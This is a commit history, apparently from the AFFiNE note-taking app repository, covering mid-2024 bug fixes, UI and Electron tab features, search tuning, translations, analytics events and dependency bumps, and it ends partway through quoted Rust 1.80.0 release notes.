fix(core): typo in migration text ( #7804 )
2024-08-09 05:23:52 +00:00
JimmFly
85637156f6
chore: adjust i18n ( #7800 )
2024-08-09 04:10:18 +00:00
EYHN
c006f3f0af
fix(core): reduce indexer performance impact ( #7803 )
2024-08-09 11:57:06 +08:00
EYHN
7efc87b6d3
chore(core): adjust migration text ( #7802 )
2024-08-09 11:50:52 +08:00
Tasnim Tantawi
450106ea54
feat(i18n): add Arabic ( #7795 )
2024-08-09 10:08:52 +08:00
EYHN
ffc12176c9
fix(electron): fix electron global state sync ( #7793 )
2024-08-08 12:02:10 +00:00
L-Sun
3d4fbcaebc
fix(core): can not get chrome version in desktop mode in iOS ( #7791 )
2024-08-08 18:37:25 +08:00
pengx17
8db37e9bbf
feat: cmd click support for journal sidebar ( #7792 )
...
fix AF-1214
The titles are also corrected:

2024-08-08 10:22:11 +00:00
pengx17
7fca13076a
feat: mid click links to open in new tab ( #7784 )
...
fix AF-1200
2024-08-08 09:43:35 +00:00
EYHN
fd6e198295
chore: bump blocksuite ( #7788 )
2024-08-08 09:27:44 +00:00
pengx17
b71945c29f
chore: tracking events for app tabs header ( #7778 )
...
fix AF-1194
2024-08-08 09:14:47 +00:00
EYHN
6ef5675be1
feat(core): better search result ( #7787 )
2024-08-08 08:56:55 +00:00
EYHN
c7aabd3a8d
feat(core): highlight doc title in search result ( #7786 )
2024-08-08 08:56:51 +00:00
CatsJuice
03fd23de39
fix(core): cloud s subscription resume button's content is blank ( #7783 )
2024-08-08 08:43:05 +00:00
forehalo
f2eafc374c
feat(server): authenticate user before ws connected ( #7777 )
2024-08-08 08:30:56 +00:00
EYHN
83244f0201
fix(core): trash doc in search result ( #7785 )
2024-08-08 08:17:48 +00:00
pengx17
f62d30527b
fix: onboarding stage not shown ( #7782 )
...
fix AF-1199
2024-08-08 03:58:11 +00:00
donteatfriedrice
025abc6169
fix: ai chat block center peek animation ( #7781 )
2024-08-08 02:17:06 +00:00
L-Sun
58b43582e1
chore: bump blocksuite ( #7779 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7870 @L-Sun
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7856 @Flrande
- https://github.com/toeverything/BlockSuite/pull/7868 @doouding
- https://github.com/toeverything/BlockSuite/pull/7869 @Flrande
- https://github.com/toeverything/BlockSuite/pull/7866 @doouding
- https://github.com/toeverything/BlockSuite/pull/7867 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7872 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7873 @doouding
- https://github.com/toeverything/BlockSuite/pull/7871 @fundon
## Misc
- https://github.com/toeverything/BlockSuite/pull/7874 @Saul-Mirone
2024-08-07 13:45:40 +00:00
L-Sun
ff68efb206
chore: bump blocksuite ( #7776 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7859 @akumatus
- https://github.com/toeverything/BlockSuite/pull/7855 @darkskygit
- https://github.com/toeverything/BlockSuite/pull/7858 @donteatfriedrice
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7843 @doouding
- https://github.com/toeverything/BlockSuite/pull/7863 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7865 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7860 @doouding
- https://github.com/toeverything/BlockSuite/pull/7857 @fundon
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7862 @L-Sun
## Misc
- https://github.com/toeverything/BlockSuite/pull/7833 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7864 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7861 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7849 @Saul-Mirone
2024-08-07 09:45:09 +00:00
CatsJuice
c8f4766ceb
fix(component): center button's icon vertically ( #7775 )
...
close AF-1211
2024-08-07 09:31:23 +00:00
EYHN
d968cfe425
fix(infra): better search result ( #7774 )
2024-08-07 09:16:43 +00:00
Ikko Eltociear Ashimine
2f0e39b702
fix(core): update en.json ( #7765 )
2024-08-07 17:16:14 +08:00
JimmFly
4e03edba44
feat(i18n): add Spanish(Argentina) and Urdu ( #7771 )
...
Support for various languages has been updated, and `Spanish (Argentina)` and `Urdu` have been added. Many thanks to the community contributors for their ongoing translation efforts.
2024-08-07 08:57:23 +00:00
pengx17
00ee2a8852
fix(electron): always show traffic light for mac ( #7773 )
...
fix AF-1209, fix PD-1550
2024-08-07 08:44:35 +00:00
CatsJuice
75a308ac79
fix(core): optimize explorer's dnd behaviors ( #7769 )
...
close AF-1198, AF-1169, AF-1204, AF-1167, AF-1168
- **fix**: empty favorite cannot be dropped(AF-1198)
- **fix**: folder close animation has a unexpected delay
- **fix**: mount explorer's DropEffect to body to avoid clipping(AF-1169)
- **feat**: drop on empty organize to create folder and put item into it(AF-1204)
- **feat**: only show explorer section's action when hovered(AF-1168)
- **feat**: animate folder icon when opened(AF-1167)
- **chore**: extract dnd related `dropEffect`, `canDrop` functions outside component
2024-08-07 08:29:19 +00:00
donteatfriedrice
f35dc744dd
fix: render ai chat block in embed doc and surface ref ( #7747 )
...
[BS-1017](https://linear.app/affine-design/issue/BS-1017/含有chat-block的页面被embed时,embed预览不会渲染chatblock )
related: https://github.com/toeverything/blocksuite/pull/7845
2024-08-07 06:55:51 +00:00
pengx17
ae9381c36d
feat: allow opening new tab for some navigation buttons ( #7764 )
...
fix AF-1010
2024-08-07 06:43:10 +00:00
donteatfriedrice
e1087a0c7b
fix: remove chat block button flag ( #7767 )
2024-08-07 06:31:04 +00:00
JimmFly
eb01e76426
feat(core): add track events for cmdk ( #7668 )
2024-08-07 05:52:42 +00:00
JimmFly
67dce9c97a
feat(core): add track events for page info ( #7667 )
2024-08-07 05:52:41 +00:00
JimmFly
7edd78884e
feat(core): add track events for page option ( #7664 )
2024-08-07 05:52:41 +00:00
JimmFly
74025fc85e
feat(core): add track events for editor header ( #7661 )
...
close AF-1054
2024-08-07 05:52:40 +00:00
pengx17
b5e543c406
feat(electron): mouse middle click to close tab ( #7759 )
...
fix AF-1200
2024-08-07 05:19:45 +00:00
donteatfriedrice
352ceca94b
fix: chat action button style ( #7766 )
...
[PD-1547](https://linear.app/affine-design/issue/PD-1547/ui-bug-chat-block-面板生成结果的-action-按钮的高度不对 )
2024-08-07 04:59:26 +00:00
akumatus
f3855c57b4
fix: can not create a new edgeless doc with "@" on edgeless ( #7772 )
...
Close issue [BS-935](https://linear.app/affine-design/issue/BS-935 ).
2024-08-07 04:46:13 +00:00
L-Sun
f6279ee47f
chore(core): remove outline viewer feature flag ( #7770 )
2024-08-07 03:46:15 +00:00
EYHN
aee24ffb31
fix(core): migration favorite appear again ( #7768 )
2024-08-07 03:31:06 +00:00
EYHN
96fed60655
chore: bump blocksuite ( #7751 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7850 @donteatfriedrice
- https://github.com/toeverything/BlockSuite/pull/7848 @L-Sun
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7853 @doouding
- https://github.com/toeverything/BlockSuite/pull/7838 @fundon
- https://github.com/toeverything/BlockSuite/pull/7851 @donteatfriedrice
## Refactor
## Misc
2024-08-07 02:52:44 +00:00
EYHN
dd74cfea14
chore(core): remove old favorite ( #7743 )
...
closes AF-1203
2024-08-07 02:19:53 +00:00
pengx17
c2cf331ff7
fix(electron): fix tab view blink issue on open new tab ( #7748 )
...
fix AF-1197
2024-08-06 15:57:40 +00:00
darkskygit
744cc542de
feat: handle copilot error ( #7760 )
...
fix BS-729 CLOUD-32 PD-1529
2024-08-06 11:19:35 +00:00
fundon
601f5fef95
chore(core): theme v1.0.2 ( #7746 )
2024-08-06 10:54:09 +00:00
darkskygit
14669b9ced
feat: improve continue to chat compatibility ( #7757 )
...
fix AF-1152
2024-08-06 09:15:42 +00:00
darkskygit
5872b884a5
fix: increase image limit of copilot ( #7756 )
...
fix AF-1080 AF-1154
2024-08-06 09:15:40 +00:00
liuyi
d0f1bb24fd
chore(core): replace with new track impl ( #7735 )
2024-08-06 09:15:15 +00:00
renovate[bot]
7373e174db
chore: bump up fast-xml-parser version to v4.4.1 [SECURITY] ( #7752 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2024-08-06 16:54:24 +08:00
forehalo
cc09085dc2
feat(core): make event track great again ( #7695 )
...


2024-08-06 08:39:29 +00:00
darkskygit
f93743dae6
fix: reset height after send ( #7755 )
...
fix PD-1427
2024-08-06 08:25:28 +00:00
darkskygit
de7933c1dd
fix: dont limit text block height in chat panel ( #7754 )
...
fix PD-1368
2024-08-06 08:25:27 +00:00
pengx17
ca7c221d23
fix(electron): onboarding not shown ( #7753 )
...
fix AF-1199
2024-08-06 07:54:32 +00:00
EYHN
873e6faef2
chore: bump @blocksuite/icons ( #7749 )
2024-08-06 05:32:19 +00:00
CatsJuice
5938d8b259
feat(core): add tooltip and toast for organize operations ( #7725 )
...
close AF-1138, AF-1139, AF-1165
2024-08-06 02:07:10 +00:00
EYHN
cd4e462d8c
fix(core): transform workspace db when enable cloud ( #7744 )
2024-08-05 15:17:19 +00:00
pengx17
a03831f2a2
fix(electron): whitescreen issue ( #7742 )
...
1. non-blurred mode whitescreen issue
2. should not close tab with cmd+w for pinned tabs
2024-08-05 14:09:22 +00:00
pengx17
0d7de67e01
refactor(electron): reduce the number of listeners for ipc ( #7740 )
...
previously there are quite a lot of api/events handlers registered on ipcMain/ipcRenderer. After this PR, the number should be significantly reduced, which will benefit performance.
2024-08-05 13:33:31 +00:00
darkskygit
0acc1bd9e8
chore: cleanup outdated model & upgrade model ( #7739 )
2024-08-05 10:13:33 +00:00
EYHN
e6e9f7d4c7
feat(core): enable feature flag for release ( #7738 )
2024-08-05 09:53:11 +00:00
pengx17
9f57ed5e84
fix(electron): find in page input border blink issue ( #7737 )
2024-08-05 09:27:21 +00:00
JimmFly
9cc976ce2e
fix(core): canvas text adapts to input scrolling ( #7733 )
...
close PD-1539
Fixed the problem that the input text in find in page cannot be scrolled correctly.
2024-08-05 09:27:18 +00:00
CatsJuice
6d253c0600
fix(core): add favorite folder in menu, adjust empty-page new page button ( #7730 )
...
close AF-1150, AF-1128, AF-1131
- Replace favorite migration related copy
- Adjust empty page's "New Page" button

- Add toggle favorite to folder menu

- Adjust `Button`
- add `withoutHover` state
- remove cursor: not-allowed when disabled
2024-08-05 09:15:17 +00:00
darkskygit
73a6723d15
fix: use correct user id in forked session ( #7710 )
2024-08-05 09:03:11 +00:00
pengx17
5050418c1a
fix(electron): app ghosting issue when quickly opening new tabs ( #7736 )
...
fix PD-1519
2024-08-05 08:51:11 +00:00
pengx17
5ab1210c9c
fix(electron): drop indicator position ( #7734 )
2024-08-05 08:03:13 +00:00
pengx17
51848ff6c3
fix(electron): allow close pinned tab ( #7732 )
2024-08-05 08:03:12 +00:00
pengx17
5f52547d9e
fix(electron): tab title/icon default state ( #7731 )
2024-08-05 07:39:51 +00:00
pengx17
561fa46232
fix(electron): add i18n setup for shell ( #7728 )
...

2024-08-05 06:52:14 +00:00
renovate[bot]
7a66212568
chore: bump up oxlint version to v0.7.0 ( #7727 )
2024-08-05 14:46:59 +08:00
pengx17
51ca7657d8
feat(electron): new tab/split view entries ( #7708 )
...
fix AF-1146
2024-08-05 05:37:50 +00:00
L-Sun
bd31c8388c
fix(core): update outline viewer style ( #7641 )
...
## What changes
- Update responsive style and fix some bug of outline viewer (https://github.com/toeverything/blocksuite/pull/7759 )
- Change left and right padding of full-width editor from `15px` to `72px`
- Hide outline viewer when side outline panel is opened ([BS-987](https://linear.app/affine-design/issue/BS-987/逻辑-bug-toc-入口和-toc-侧边栏共存 ))
- Add entries of outline panel and frame panel in more menu of detail page header ( [BS-996](https://linear.app/affine-design/issue/BS-996/page-mode-下的-page-option-缺少-view-table-of-contents-的入口 ) , [BS-1006](https://linear.app/affine-design/issue/BS-1006/edgeless-mode-的-page-options-里缺少-view-all-frames ))
- Add outline viewer to dock peek preview ( [BS-995](https://linear.app/affine-design/issue/BS-995/center-peek-里缺少-quick-toc-的入口 ) )
- Add more e2e tests for outline viewer
2024-08-05 03:57:48 +00:00
L-Sun
545bd032a7
fix(core): app height exceeds viewport of mobile ( #7706 )
...
TL;DR
use `100dvh` instead of `100vh`.
https://stackoverflow.com/a/72245072
PS: The `100dvh` is tested in Firefox in macOS
## Before
iPad
<img src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/MyRfgiN4RuBxJfrza3SG/c81548ed-7ca0-4f88-af7c-cce498958a28.png " width="250">
Phone
<img src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/MyRfgiN4RuBxJfrza3SG/4559554d-6f3f-445f-82c1-39a0dc2eb664.png " width="250">
## After
iPad
<img src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/MyRfgiN4RuBxJfrza3SG/51fe97f9-f488-432c-9866-20524efd08de.png " width="250">
Phone
<img src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/MyRfgiN4RuBxJfrza3SG/a05cce56-38a5-47df-a0c6-f757d94ef6b8.png " width="250">
2024-08-05 03:42:15 +00:00
pengx17
e3878ae8bf
build(electron): nightly build issue for windows ( #7649 )
...
ref https://github.com/toeverything/AFFiNE/actions/runs/10156494874/job/28085093900
2024-08-05 03:28:02 +00:00
pengx17
c0c5c83dad
fix(electron): should activate the target tab when closing other tabs ( #7704 )
...
fix PD-1520
2024-08-05 03:11:55 +00:00
pengx17
cbdcfdc2d8
fix(electron): duplicate tab views issue ( #7703 )
...
fix PD-1523
2024-08-05 03:11:52 +00:00
pengx17
741ff2379e
fix(electron): reload view in tab context menu issue ( #7702 )
...
fix PD-1524
2024-08-05 03:11:50 +00:00
pengx17
9307acf0de
fix(core): ctrl/cmd + click on add page button opens in new tab ( #7701 )
...
fix PD-1521
2024-08-05 03:11:47 +00:00
pengx17
0468355593
test(electron): adjust expect timeout for CI ( #7707 )
2024-08-05 03:11:44 +00:00
CatsJuice
249f3471c9
feat(component): shortcut style for tooltip ( #7721 )
...

- New `shortcut` prop for `<Tooltip />`
- single key
```tsx
<Tooltip shortcut="T" />
```
- multiple
```tsx
<Tooltip shortcut={["⌘", "K"]} />
```
- Round tooltip's arrow
- Use new design system colors
- Replace some usage
- App sidebar switch
- Editor mode switch
- New tab (new)
2024-08-05 02:57:24 +00:00
CatsJuice
3d855647c7
refactor(component): refactor the implementation of Button and IconButton ( #7716 )
...
## Button
- Remove props withoutHoverStyle
refactor hover impl with independent layer, so that hover-color won't affect the background even if is overridden outside
- Update `type` (renamed to `variant`):
- remove `processing` and `warning`
- rename `default` with `secondary`
- Remove `shape` props
- Remove `icon` and `iconPosition`, replaced with `prefix: ReactNode` and `suffix: ReactNode`
- Integrate tooltip for more convenient usage
- New Storybook document
- Focus style
## IconButton
- A Wrapper base on `<Button />`
- Override Button size and variant
- size: `'12' | '14' | '16' | '20' | '24' | number`
These presets size are referenced from the design system.
- variant: `'plain' | 'solid' | 'danger' | 'custom'`
- Inset icon via Button 's prefix
## Fix
- fix some button related issues
- close AF-1159, AF-1160, AF-1161, AF-1162, AF-1163, AF-1158, AF-1157
## Storybook

2024-08-05 02:57:23 +00:00
donteatfriedrice
10deed94e3
fix: center peek message role ( #7723 )
2024-08-05 02:43:58 +00:00
EYHN
f108b95704
feat(core): tuning for better search ( #7713 )
2024-08-05 02:29:50 +00:00
EYHN
ad26102815
fix(core): fix scroll block into view ( #7712 )
2024-08-05 02:29:49 +00:00
EYHN
05448f50af
fix(core): wrong display of 404 page ( #7711 )
2024-08-02 10:40:58 +00:00
EYHN
e54be7dc02
feat(core): loading ui for favorite and organize ( #7700 )
2024-08-02 07:17:01 +00:00
donteatfriedrice
94c5effdd5
fix: should save chat to block when doc mode ( #7697 )
...
[BS-1033](https://linear.app/affine-design/issue/BS-1033/在page模式下尝试存chat-block,被告知失败,预期是切换到白板模式直接操作成功 )
2024-08-02 13:14:15 +08:00
donteatfriedrice
62fc7e2f4d
fix: support chat in different doc ( #7693 )
...
fix:
[BS-990](https://linear.app/affine-design/issue/BS-990/避免centerpeek中发起的会话,等待ai返回时,页面失去响应 )
[BS-1005](https://linear.app/affine-design/issue/BS-1005/chat-block无法被copy-paste到别的文档中,duplicate全篇文档后,可以center-peek )
2024-08-02 13:14:15 +08:00
donteatfriedrice
f7798a00c1
feat: patch edgeless clipboard to support cuntom block copy paste ( #7689 )
...
fix: [BS-1005](https://linear.app/affine-design/issue/BS-1005/chat-block无法被copy-paste到别的文档中,duplicate全篇文档后,可以center-peek )
related: https://github.com/toeverything/blocksuite/pull/7797
2024-08-02 13:14:14 +08:00
pengx17
854718db0e
test(electron): enable trace file for desktop tests ( #7692 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/T2klNLEk0wxLh4NRDzhk/e8d87ee7-cea6-4188-80a7-1a64f6c74eca.webm ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/T2klNLEk0wxLh4NRDzhk/e8d87ee7-cea6-4188-80a7-1a64f6c74eca.webm ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/T2klNLEk0wxLh4NRDzhk/e8d87ee7-cea6-4188-80a7-1a64f6c74eca.webm ">e02e866a6496b210b8883798d82783d8.webm</video>
one failed run but no valuable result
2024-08-02 04:07:33 +00:00
donteatfriedrice
2cfe9e8b9e
feat: bump blocksuite ( #7698 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7801 @akumatus
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7811 @donteatfriedrice
- https://github.com/toeverything/BlockSuite/pull/7808 @doouding
- https://github.com/toeverything/BlockSuite/pull/7813 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7803 @fundon
- https://github.com/toeverything/BlockSuite/pull/7809 @Flrande
## Refactor
## Misc
- https://github.com/toeverything/BlockSuite/pull/7815 @doodlewind
2024-08-02 03:20:08 +00:00
pengx17
bfff10e25e
feat(electron): app tabs dnd ( #7684 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/T2klNLEk0wxLh4NRDzhk/cd84e155-9f2e-4d12-a933-8673eb6bc6cb.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/T2klNLEk0wxLh4NRDzhk/cd84e155-9f2e-4d12-a933-8673eb6bc6cb.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/T2klNLEk0wxLh4NRDzhk/cd84e155-9f2e-4d12-a933-8673eb6bc6cb.mp4 ">Kapture 2024-07-31 at 19.39.30.mp4</video>
fix AF-1149
fix PD-1513
fix PD-1515
2024-08-02 02:02:03 +00:00
L-Sun
4719ffadc6
chore: bump blocksuite ( #7696 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7807 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7786 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7797 @donteatfriedrice
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7814 @fundon
- https://github.com/toeverything/BlockSuite/pull/7812 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7792 @fundon
- https://github.com/toeverything/BlockSuite/pull/7788 @fundon
- https://github.com/toeverything/BlockSuite/pull/7805 @doouding
- https://github.com/toeverything/BlockSuite/pull/7810 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7802 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7804 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7799 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7753 @CatsJuice
- https://github.com/toeverything/BlockSuite/pull/7798 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7796 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7793 @doouding
- https://github.com/toeverything/BlockSuite/pull/7795 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7791 @fundon
- https://github.com/toeverything/BlockSuite/pull/7747 @doouding
- https://github.com/toeverything/BlockSuite/pull/7785 @fundon
- https://github.com/toeverything/BlockSuite/pull/7784 @akumatus
## Misc
- https://github.com/toeverything/BlockSuite/pull/7800 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7790 @fourdim
2024-08-02 01:29:10 +00:00
pengx17
07409b8a91
refactor(electron): tab title/icon update logic ( #7675 )
...
fix AF-1122
fix AF-1136
2024-08-01 16:43:18 +00:00
CatsJuice
e60b2d64e5
fix(core): new no children status for explorer ( #7686 )
...
close AF-1140
2024-08-01 09:41:13 +00:00
CatsJuice
8816d2a639
feat(core): adjust explorer section style, persist collapsable state ( #7679 )
...
close AF-1124,AF-1129,AF-1134,AF-1144
2024-08-01 09:41:09 +00:00
EYHN
553fbed60f
feat(core): add globalcontext info to mixpanel track ( #7681 )
2024-08-01 09:29:31 +00:00
EYHN
bb767a6cdc
fix(component): modal overlap issue ( #7691 )
2024-08-01 08:03:21 +00:00
L-Sun
33fc00f8c7
chore(core): set read-only mode on mobile device ( #7651 )
...
Close [BS-795](https://linear.app/affine-design/issue/BS-795/affine-mobile-设置只读模式 )
- Set read-only mode on mobile device
- Add mobile only support read-only warning toast
- remove `user-select: none` so that user can select text in read-only mode
2024-08-01 05:22:50 +00:00
donteatfriedrice
3a0241340c
fix: optimize ai chat block position calculation ( #7683 )
...
[BS-977](https://linear.app/affine-design/issue/BS-977/新生成的分支chat-block应该采用类似mindmap新节点的的定位方式,避免互相遮盖 )
2024-08-01 01:37:23 +00:00
L-Sun
2093685385
chore: bump blocksuite ( #7680 )
2024-07-31 21:57:51 +08:00
pengx17
10e78d617e
build(electron): re-enable windows signing ( #7682 )
...
ref https://github.com/toeverything/AFFiNE/pull/7645
2024-07-31 10:00:19 +00:00
darkskygit
49529b7e63
fix: make chat button click event work fine ( #7658 )
...
fix PD-1504
2024-07-31 09:24:54 +00:00
fundon
48e17fad02
feat(core): experience function color picker ( #7677 )
2024-07-31 09:07:29 +00:00
forehalo
4ec89ebd69
chore(server): standardize server db names and columns ( #7674 )
2024-07-31 07:59:23 +00:00
forehalo
c6d4985cba
fix: wrong public path for stable env ( #7676 )
2024-07-31 07:19:32 +00:00
pengx17
280e24934a
fix(electron): window theme issue after exiting presentation ( #7671 )
2024-07-31 07:03:32 +00:00
pengx17
6b8f99c013
fix: using width atom for syncing app headers position ( #7666 )
...
may use global state to replace these sidebar state atoms
fix AF-1109
2024-07-31 07:03:30 +00:00
pengx17
812fdd27b5
fix: tab label overflow style when there is only one tab ( #7665 )
...
before

after

2024-07-31 07:03:28 +00:00
donteatfriedrice
e1e1b29afb
fix: cannot clean chat panel histories ( #7673 )
2024-07-31 04:14:06 +00:00
donteatfriedrice
52a95af828
fix: ai chat block added later should be with higher index ( #7660 )
...
[BS-1000](https://linear.app/affine-design/issue/BS-1000/更好地处理新增内容的层级 )
2024-07-31 03:16:34 +00:00
CatsJuice
ede576061d
fix(core): adjust sidebar explorer empty status ( #7657 )
...
Close AF-1126,AF-1132
2024-07-31 02:41:53 +00:00
CatsJuice
083123cdfb
fix(component): adjust renaming style ( #7654 )
2024-07-31 02:26:34 +00:00
CatsJuice
12a2f929f8
fix(component): stop renaming modal propagation & input auto focus ( #7653 )
...
close AF-1125
2024-07-31 02:26:30 +00:00
CatsJuice
c1b26473a9
chore(core): update sidebar all-docs icon ( #7626 )
...
close AF-1079
2024-07-31 02:13:02 +00:00
Saul-Mirone
c7217ed443
chore: bump blocksuite 240730 ( #7662 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7761 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7755 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7598 @Flrande
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7769 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7766 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7767 @akumatus
- https://github.com/toeverything/BlockSuite/pull/7726 @siyou
- https://github.com/toeverything/BlockSuite/pull/7765 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7763 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7764 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7760 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7742 @fundon
- https://github.com/toeverything/BlockSuite/pull/7754 @fundon
- https://github.com/toeverything/BlockSuite/pull/7756 @donteatfriedrice
- https://github.com/toeverything/BlockSuite/pull/7752 @zzj3720
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7758 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7750 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7746 @fundon
## Misc
- https://github.com/toeverything/BlockSuite/pull/7744 @Saul-Mirone
2024-07-31 01:38:53 +00:00
pengx17
cd823fe118
fix(electron): app flicker issue ( #7663 )
...
fix AF-1117
2024-07-30 14:19:10 +00:00
EYHN
b343f975fb
feat(core): add track events for sidebar ( #7659 )
2024-07-30 13:22:22 +00:00
EYHN
ab92efcfc0
feat(core): improve mixpanel ( #7652 )
...
move @affine/core/utils/mixpanel -> @affine/core/mixpanel
now you can debug mixpanel on browser devtool

2024-07-30 13:22:17 +00:00
pengx17
ea7066d02c
fix: icon color active style ( #7656 )
...
fix PD-1500
2024-07-30 11:51:17 +00:00
pengx17
d80c80ecdd
fix: remove shadow for bordered main container ( #7655 )
...
fix PD-1498
2024-07-30 11:38:23 +00:00
EYHN
482b5da02f
fix(core): fix layout overflow ( #7647 )
2024-07-30 07:03:07 +00:00
liuyi
fcf0ecbaa2
feat(server): runtime service config ( #7644 )
2024-07-30 14:58:24 +08:00
liuyi
67248316bd
fix(core): scrolling break client style in bordered container ( #7650 )
2024-07-30 14:57:02 +08:00
liuyi
dd47c14c65
fix(core): wrong padding position when ai panel is active ( #7648 )
2024-07-30 13:47:17 +08:00
pengx17
63e8729da4
build(electron): skip signing for windows ( #7645 )
...
fix AF-1133
2024-07-30 04:56:47 +00:00
renovate
d769c8bb87
chore: bump up rustc version to v1.80.0 ( #7628 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Update | Change |
|---|---|---|
| [rustc](https://togithub.com/rust-lang/rust ) | minor | `1.79.0` -> `1.80.0` |
---
### Release Notes
<details>
<summary>rust-lang/rust (rustc)</summary>
### [`v1.80.0`](https://togithub.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1800-2024-07-25 )
[Compare Source](https://togithub.com/rust-lang/rust/compare/1.79.0...1.80.0 )
\==========================
<a id="1.80-Language"></a>
## Language
- [Document maximum allocation size](https://togithub.com/rust-lang/rust/pull/116675/ )
- [Allow zero-byte offsets and ZST read/writes on arbitrary pointers](https://togithub.com/rust-lang/rust/pull/117329/ )
- [Support C23's variadics without a named parameter](https://togithub.com/rust-lang/rust/pull/124048/ )
- [Stabilize `exclusive_range_pattern` feature](https://togithub.com/rust-lang/rust/pull/124459/ )
- [Guarantee layout and ABI of `Result` in some scenarios](https://togithub.com/rust-lang/rust/pull/124870 )
<a id="1.80-Compiler"></a>
## Compiler
- [Update cc crate to v1.0.97 allowing additional spectre mitigations on MSVC targets](https://togithub.com/rust-lang/rust/pull/124892/ )
- [Allow field reordering on types marked `repr(packed(1))`](https://togithub.com/rust-lang/rust/pull/125360/ )
- [Add a lint against never type fallback affecting unsafe code](https://togithub.com/rust-lang/rust/pull/123939/ )
- [Disallow cast with trailing braced macro in let-else](https://togithub.com/rust-lang/rust/pull/125049/ )
- [Expand `for_loops_over_fallibles` lint to lint on fallibles behind references.](https://togithub.com/rust-lang/rust/pull/125156/ )
- [self-contained linker: retry linking without `-fuse-ld=lld` on CCs that don't support it](https://togithub.com/rust-lang/rust/pull/125417/ )
- [Do not parse CVarArgs (`...`) as a type in trait bounds](https://togithub.com/rust-lang/rust/pull/125863/ )
- Improvements to LLDB formatting [#​124458](https://togithub.com/rust-lang/rust/pull/124458 ) [#​124500](https://togithub.com/rust-lang/rust/pull/124500 )
- [For the wasm32-wasip2 target default to PIC and do not use `-fuse-ld=lld`](https://togithub.com/rust-lang/rust/pull/124858/ )
- [Add x86\_64-unknown-linux-none as a tier 3 target](https://togithub.com/rust-lang/rust/pull/125023/ )
- [Lint on `foo.into_iter()` resolving to `&Box<[T]>: IntoIterator`](https://togithub.com/rust-lang/rust/pull/124097/ )
<a id="1.80-Libraries"></a>
## Libraries
- [Add `size_of` and `size_of_val` and `align_of` and `align_of_val` to the prelude](https://togithub.com/rust-lang/rust/pull/123168/ )
- [Abort a process when FD ownership is violated](https://togithub.com/rust-lang/rust/pull/124210/ )
- [io::Write::write_fmt: panic if the formatter fails when the stream does not fail](https://togithub.com/rust-lang/rust/pull/125012/ )
- [Panic if `PathBuf::set_extension` would add a path separator](https://togithub.com/rust-lang/rust/pull/125070/ )
- [Add assert_unsafe_precondition to unchecked\_{add,sub,neg,mul,shl,shr} methods](https://togithub.com/rust-lang/rust/pull/121571/ )
- [Update `c_char` on AIX to use the correct type](https://togithub.com/rust-lang/rust/pull/122986/ )
- [`offset_of!` no longer returns a temporary](https://togithub.com/rust-lang/rust/pull/124484/ )
- [Handle sigma in `str.to_lowercase` correctly](https://togithub.com/rust-lang/rust/pull/124773/ )
- [Raise `DEFAULT_MIN_STACK_SIZE` to at least 64KiB](https://togithub.com/rust-lang/rust/pull/126059/ )
<a id="1.80-Stabilized-APIs"></a>
## Stabilized APIs
- [`impl Default for Rc<CStr>`](https://doc.rust-lang.org/beta/alloc/rc/struct.Rc.html#impl-Default-for-Rc%3CCStr%3E )
- [`impl Default for Rc<str>`](https://doc.rust-lang.org/beta/alloc/rc/struct.Rc.html#impl-Default-for-Rc%3Cstr%3E )
